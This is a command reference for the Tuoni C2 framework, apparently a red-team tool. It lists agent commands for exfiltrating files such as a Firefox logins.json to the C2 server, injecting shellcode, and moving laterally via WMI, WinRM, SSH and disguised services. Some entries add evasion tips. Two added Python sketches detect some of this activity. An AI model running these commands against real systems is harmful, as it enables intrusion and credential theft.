Plugin Commands

Commands delivered as server-side plugins. For execution configuration options (process injection, PPID spoofing, etc.) see Execution Context.

Commercial additions

The commercial payload unlocks additional plugin commands: amsi-bypass, mimikatz, keylogger, load-pe, load-dll, load-elf, screen-tracker, dll-proxy, memory-layout, webcam, kill, and suspend. See commercial plugin commands →

Quick Reference

Command OS Summary
connect-smb Windows Connect to an SMB (bind) agent
connect-tcp Win / Linux / BSD Connect to a TCP bind agent
cp Win / Linux / BSD Copy a file or directory
download Win / Linux / BSD Exfiltrate a file to the C2
execute-assembly Windows Execute a .NET assembly in memory
inject Windows Inject and run shellcode
jump-service Windows Lateral movement via a Windows service
jump-ssh Windows Lateral movement via SSH
jump-winrm Windows Lateral movement via WinRM
jump-wmi Windows Lateral movement via WMI
mkdir Win / Linux / BSD Create a directory
mv Win / Linux / BSD Move or rename a file
portscan Windows TCP port scan with host discovery
procinfo Windows Detailed info about the agent process
rm Win / Linux / BSD Delete a file
rmdir Win / Linux / BSD Delete a directory
rportfwd Win / Linux / BSD Create a reverse port forward through the C2
screenshot Windows Capture the current screen
socks5 Win / Linux / BSD Start a SOCKS5 proxy on the agent network
spawn Windows Spawn a new agent
upload Win / Linux / BSD Write a file to the target filesystem
upload-payload Win / Linux / BSD Write a generated payload to the target filesystem

connect-smb

Purpose: Connects a parent agent to an SMB bind agent, establishing a relayed communication channel.

OS Support: Windows

Parameter Type Required Default Description
host string Yes - IP address or hostname of the target running the SMB agent.
pipename string Yes - Named pipe the SMB agent is listening on.

Example:

connect-smb --host 192.168.1.50 --pipename tuoni_smb

Info

The SMB agent must already be running and listening on the specified pipe before this command is sent. Use upload-payload to stage the agent binary first if needed.


connect-tcp

Purpose: Establishes a connection to a TCP bind agent, making it reachable through the current agent.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
host string Yes - IP address or hostname of the target running the TCP bind agent.
port int Yes - TCP port the bind agent is listening on.

Example:

connect-tcp --host 10.10.10.20 --port 4444


cp

Purpose: Copies a file or directory on the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
source string Yes - Source file or directory path.
destination string Yes - Destination file or directory path.

Example:

cp --source C:\Temp\tool.exe --destination C:\Windows\Temp\svc.exe


download

Purpose: Reads a file from the target filesystem and returns it to the C2 operator.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Path of the file to download. Supports environment variables (e.g. %APPDATA%).

Example:

download --filepath C:\Users\jsmith\AppData\Roaming\Mozilla\Firefox\Profiles\default\logins.json


execute-assembly

Purpose: Loads and executes a .NET assembly (EXE) entirely in memory without writing it to disk.

OS Support: Windows

Parameter Type Required Default Description
@files.executable file Yes - The .NET assembly .exe file to execute.
parameters string No - Command-line arguments to pass to the assembly.

Example:

execute-assembly --@files.executable Seatbelt.exe --parameters "-group=system"

OPSEC

.NET CLR loading is detectable by EDR products monitoring for clr.dll loaded into unusual processes. Configure the Execution Context to control the sacrificial process used for assembly execution.
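
From the monitoring side, the check this note refers to can be written as a first-seen rule over image-load telemetry. The sketch below is an added example, not Tuoni code: it assumes Sysmon Event ID 7 records already parsed into dictionaries, and the sample events, host names and the inclusion of clrjit.dll are constructed for illustration.

```python
import ntpath

# Runtime modules whose load marks a process as hosting .NET Framework code.
# The page names clr.dll; clrjit.dll is added here as an assumption.
CLR_MODULES = {"clr.dll", "clrjit.dll"}

def is_clr_load(event):
    """True for an image-load record (Sysmon Event ID 7) that loads the CLR."""
    return (event.get("EventID") == 7
            and ntpath.basename(event["ImageLoaded"]).lower() in CLR_MODULES)

def build_baseline(events):
    """Process images seen loading the CLR during a known-good window."""
    return {e["Image"].lower() for e in events if is_clr_load(e)}

def first_seen_clr_hosts(events, baseline):
    """CLR loads by process images that never loaded it in the baseline."""
    return [
        {"host": e["Computer"], "image": e["Image"], "pid": e["ProcessId"]}
        for e in events
        if is_clr_load(e) and e["Image"].lower() not in baseline
    ]

CLR = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"

# Constructed sample records; field names follow Sysmon Event ID 7.
BASELINE_EVENTS = [
    {"EventID": 7, "Computer": "WS01", "ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": CLR},
]
LIVE_EVENTS = [
    {"EventID": 7, "Computer": "WS01", "ProcessId": 5332,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": CLR},
    {"EventID": 7, "Computer": "WS01", "ProcessId": 6508,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": CLR},
    {"EventID": 7, "Computer": "WS01", "ProcessId": 6508,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

if __name__ == "__main__":
    for alert in first_seen_clr_hosts(LIVE_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(alert)
```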


inject

Purpose: Injects raw shellcode into a process and executes it.

OS Support: Windows

Parameter Type Required Default Description
@files.shellcode file Yes - The raw shellcode binary.

Example:

inject --@files.shellcode beacon.bin

OPSEC

Shellcode injection is one of the most heavily monitored operations by EDR products. Use the Execution Context to configure the injection technique and target process. Run ps first to identify a suitable host process.


jump-service

Purpose: Achieves lateral movement by copying a payload to a remote host and running it as a Windows service.

OS Support: Windows

Parameter Type Required Default Description
payloadId string Yes - ID of the service-executable payload to deploy.
copyMethod string Yes - Method for copying the payload to the target. Options: SMB, NONE.
copyPath string Yes - Full destination path for the copied payload on the remote host.
target string Yes - Target machine IP address or hostname.
servicePath string Yes - Path used when creating the service (should match copyPath).
serviceName string Yes - Internal name of the service to create.
serviceDisplayName string Yes - Display name of the service.
cleanup bool No false Delete the service and binary after execution.
username string No - Username for remote authentication (if not using the current token).
password string No - Password for remote authentication.

Example:

jump-service --payloadId abc123 --copyMethod SMB --copyPath \\DC01\C$\Windows\Temp\svc.exe
  --target DC01 --servicePath C:\Windows\Temp\svc.exe
  --serviceName TuoniSvc --serviceDisplayName "Windows Update Helper" --cleanup true

Tip

Set cleanup: true for operational security - the service and its binary are removed after the payload executes.

Privileges required

Creating services on a remote host requires administrative privileges. Use token-steal or token-make to obtain appropriate credentials before running this command.
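
The copy-then-install sequence described for copyMethod SMB leaves two correlatable records on the target: a file written over SMB and a service install pointing at the same path. The following is an added detection sketch, not part of Tuoni: it assumes Sysmon Event ID 11 and System-log Event ID 7045 records normalised into one dictionary shape with a shared Time field, and the sample events and the five-minute window are constructed.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed correlation window

def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")

def service_binary(image_path):
    """Executable path from a 7045 ImagePath, which may be quoted."""
    path = image_path.strip()
    if path.startswith('"'):
        path = path[1:].split('"', 1)[0]
    return path.lower()

def smb_staged_services(events, window=WINDOW):
    """Service installs whose binary was written remotely just beforehand."""
    drops, hits = {}, []
    for e in sorted(events, key=lambda e: parse_time(e["Time"])):
        host, when = e["Computer"].lower(), parse_time(e["Time"])
        # Sysmon 11 (FileCreate): writes arriving over SMB are attributed to "System".
        if e["EventID"] == 11 and e["Image"].lower() == "system":
            drops[(host, e["TargetFilename"].lower())] = when
        # System log 7045: a service was installed.
        elif e["EventID"] == 7045:
            dropped = drops.get((host, service_binary(e["ImagePath"])))
            if dropped is not None and when - dropped <= window:
                hits.append({"host": e["Computer"], "service": e["ServiceName"],
                             "binary": e["ImagePath"],
                             "delay_s": int((when - dropped).total_seconds())})
    return hits

# Constructed, already-normalised records; paths and names reuse the page's example.
EVENTS = [
    {"EventID": 11, "Time": "2024-05-01 10:00:02", "Computer": "DC01",
     "Image": "System", "TargetFilename": r"C:\Windows\Temp\svc.exe"},
    {"EventID": 7045, "Time": "2024-05-01 10:00:05", "Computer": "DC01",
     "ServiceName": "TuoniSvc", "ImagePath": r"C:\Windows\Temp\svc.exe"},
    {"EventID": 11, "Time": "2024-05-01 11:30:00", "Computer": "WS01",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Program Files\Vendor\agent.exe"},
    {"EventID": 7045, "Time": "2024-05-01 11:30:04", "Computer": "WS01",
     "ServiceName": "VendorAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service'},
]

if __name__ == "__main__":
    for hit in smb_staged_services(EVENTS):
        print(hit)
```

The cleanup option removes the service and its binary, but the 7045 and file-create records stay in the logs, so the correlation still works after the fact.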


jump-ssh

Purpose: Achieves lateral movement by running commands or staging a payload on a remote host via SSH.

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the payload to deploy. Leave empty to run a command without staging.
copyMethod string No - Copy method. Options: SMB, NONE.
copyPath string No - Destination path on the remote host.
target string Yes - Target machine IP address or hostname.
cmdline string No - Command line to execute on the remote host.
username string Yes - SSH username.
password string No - SSH password (use this or a private key).
@files.privateKeyPEM file No - PEM-encoded private key for key-based authentication.
privateKeyPassword string No - Passphrase for the private key file.

Example:

jump-ssh --target 10.10.10.30 --username deploy --@files.privateKeyPEM id_rsa
  --cmdline "/tmp/agent &"


jump-winrm

Purpose: Executes commands or runs an executable on a remote host using Windows Remote Management (WinRM).

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the executable payload to run.
copyMethod string No - Copy method. Options: SMB, NONE.
copyPath string No - Destination path for the payload.
target string Yes - Target machine IP address or hostname.
executablePath string No - Path of the executable to run on the remote host.
customPowershell string No - Custom PowerShell script to execute.
username string No - Username for authentication.
password string No - Password for authentication.

Example:

jump-winrm --target DC01 --username "CORP\Administrator" --password "P@ssword1"
  --payloadId abc123 --copyMethod SMB --copyPath C:\Windows\Temp\agent.exe
  --executablePath C:\Windows\Temp\agent.exe

Privileges required

WinRM lateral movement requires the target machine to have WinRM enabled and the user to be a member of the Remote Management Users group or a local administrator.


jump-wmi

Purpose: Executes a command or payload on a remote host using Windows Management Instrumentation (WMI).

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the executable payload to run.
copyMethod string No - Copy method for staging the payload. Options: SMB, NONE.
copyPath string No - Destination path for the staged payload.
target string Yes - Target machine IP address or hostname.
cmdline string No - Command line to execute via WMI.
username string No - Username for remote authentication.
password string No - Password for remote authentication.

Example:

jump-wmi --target 192.168.1.10 --username "CORP\Administrator" --password "P@ssword1"
  --payloadId abc123 --copyMethod SMB --copyPath C:\Windows\Temp\agent.exe
  --cmdline C:\Windows\Temp\agent.exe

Tip

jump-wmi can use a stolen token - run token-steal first to avoid passing plaintext credentials. See the Lateral Movement use case for a full walkthrough.


mkdir

Purpose: Creates a new directory on the target filesystem, including any missing parent directories.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
dirpath string Yes - Path of the directory to create.

Example:

mkdir --dirpath C:\ProgramData\Updates\cache


mv

Purpose: Moves or renames a file or directory on the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
source string Yes - Source file or directory path.
destination string Yes - Destination path.
overwrite bool No false Allow overwriting the destination if it already exists.

Example:

mv --source C:\Temp\tool.exe --destination C:\Windows\System32\tool.exe --overwrite true


portscan

Purpose: Performs a TCP port scan against one or more hosts, logging discovered hosts and open ports to the Discovery database.

OS Support: Windows

Parameter Type Required Default Description
ips string Yes - IP addresses or CIDR ranges to scan, comma-separated (e.g. 10.0.0.1,10.0.0.0/24).
ports string Yes - Ports or ranges to scan, comma-separated (e.g. 22,80,443,8000-8080).
hostDiscovery string No ICMP Host discovery method before scanning. Options: ICMP, ARP, NONE. Use NONE to skip discovery and assume all hosts are up.
timeout int No 1000 Connection timeout per port in milliseconds.
threads int No 10 Number of concurrent threads for scanning.

Example:

portscan --ips 10.10.10.0/24 --ports 22,80,443,445,3389,8080 --hostDiscovery ICMP --timeout 500 --threads 50

Tip

Discovered hosts and services are automatically added to the Discovery database and visible in the Discovery GUI. Use NONE for hostDiscovery when targeting a specific known host to skip the ping sweep.


procinfo

Purpose: Retrieves additional details about the agent's own process (architecture, integrity level, token info, loaded modules).

OS Support: Windows

Parameters: None

Example:

procinfo


rm

Purpose: Deletes a file from the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Path of the file to delete. Supports environment variables.

Example:

rm --filepath C:\Windows\Temp\agent.exe


rmdir

Purpose: Deletes a directory from the target filesystem, including all contents recursively.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
dirpath string Yes - Path of the directory to delete. Supports recursive deletion.

Example:

rmdir --dirpath C:\ProgramData\Updates\cache

Warning

This deletes the directory and all its contents recursively with no confirmation. Verify the path before running.


rportfwd

Purpose: Creates a reverse port forward on the agent, routing inbound traffic back through the C2 server to a specified host and port.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
bindIp string No 0.0.0.0 IP or interface to listen on within the target network.
bindPort int Yes - Port the agent listens on in the target network.
forwardHost string Yes - Host to forward traffic to (resolved from the Tuoni server).
forwardPort int Yes - Port to forward traffic to.

Example:

rportfwd --bindPort 8080 --forwardHost 192.168.100.5 --forwardPort 80

Info

Traffic arrives at agent:8080 in the target network and is forwarded through the C2 server to 192.168.100.5:80. This allows resources on your operator machine or internal network to be reached from within the target environment.


screenshot

Purpose: Captures the current screen of the target machine and returns the image.

OS Support: Windows

Parameters: None

Example:

screenshot

Tip

For continuous monitoring, use the commercial screen-tracker command, which captures screenshots automatically whenever a specified percentage of the screen changes.


socks5

Purpose: Opens a SOCKS5 proxy listener on the C2 server that routes traffic through the agent's network.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
port int Yes - Port the C2 server opens for the SOCKS5 proxy.

Example:

socks5 --port 1080

Info

After running this command, configure your tools (Proxychains, Burp, etc.) to use 127.0.0.1:1080 (or the C2 server IP) as a SOCKS5 proxy. All traffic is routed through the agent's network interface.


spawn

Purpose: Spawns a new agent using a specified listener payload, optionally with encrypted communication.

OS Support: Windows

Parameter Type Required Default Description
payloadId string Yes - ID of the listener payload to use for the new agent.
encryptedCommunication bool No true Whether the new agent uses encrypted communication.

Example:

spawn --payloadId abc123


upload

Purpose: Writes a file from the operator's machine to the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Destination path on the target. Supports environment variables.
@files.file file Yes - The file content to upload.

Example:

upload --filepath C:\Windows\Temp\nc.exe --@files.file nc64.exe


upload-payload

Purpose: Writes a pre-generated Tuoni payload directly to the target filesystem using its payload ID - no manual file selection needed.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Destination path on the target. Supports environment variables.
payloadId string Yes - ID of the payload to write (as shown in the Payloads page).

Example:

upload-payload --filepath C:\Windows\Temp\agent.exe --payloadId abc123

Tip

upload-payload is the preferred way to stage agents for lateral movement commands (jump-wmi, jump-service, etc.) - it avoids handling the binary manually and keeps the payload ID consistent.